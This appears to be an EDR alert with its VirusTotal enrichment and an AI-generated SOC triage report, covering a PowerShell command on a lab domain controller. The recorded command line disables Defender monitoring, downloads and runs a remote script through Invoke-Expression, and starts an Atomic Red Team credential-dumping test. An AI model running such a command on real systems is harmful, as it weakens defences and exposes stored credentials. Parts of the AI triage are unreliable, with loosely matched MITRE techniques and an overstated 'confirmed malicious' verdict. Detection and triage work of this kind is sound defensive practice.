{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "2031dedd-d87f-45cc-8f2f-eec369c2a850",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364752116,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364752000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned during this session?",
    "Were there any network connections established to external IPs?",
    "Is the SYSTEM account running legitimate administrative tasks on this host?",
    "Has this host been part of a recent phishing or credential compromise campaign?"
  ],
  "ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path alone. However, the command line arguments reveal malicious intent through IEX usage to fetch code from an external source, execution policy modification, and invocation of offensive testing frameworks (Atomic Red Team). The parent process chain shows cmd.exe spawning PowerShell, suggesting automation or batch script orchestration.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1003.004"
    }
  ],
  "mitre_techniques": [
    "T1059.001",
    "T1059.002",
    "T1059.003",
    "T1066",
    "T1078",
    "T1566"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
    "Review and revoke SYSTEM account privileges if not required for this operation",
    "Capture memory dump for forensic analysis of any injected payloads",
    "Check for persistence mechanisms in startup locations"
  ],
  "risk_score": 82,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis detection represents a confirmed malicious PowerShell execution by the SYSTEM account using IEX to download and execute code from an external GitHub repository. The command line explicitly disables real-time monitoring and invokes Atomic Red Team testing tools, indicating active offensive operations rather than legitimate system maintenance.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path alone. However, the command line arguments reveal malicious intent through IEX usage to fetch code from an external source, execution policy modification, and invocation of offensive testing frameworks (Atomic Red Team). The parent process chain shows cmd.exe spawning PowerShell, suggesting automation or batch script orchestration.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process from C:\\Windows\\System32 is legitimate but executes suspicious commands to change execution policies, disable security monitoring, and install tools from GitHub, indicating potential malicious intent. The parent process is cmd.exe from a temporary location, which is a common attack vector.\n\n**IOC Analysis:** The FILE_PATH is in a known-good system directory, but the command line includes actions to bypass security (e.g., Set-MpPreference -DisableRealtimeMonitoring) and download/install tools from GitHub, which could be malicious. The HASH and FILE_IS_SIGNED confirm it\u0027s a legitimate Microsoft binary, but the context suggests misuse.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}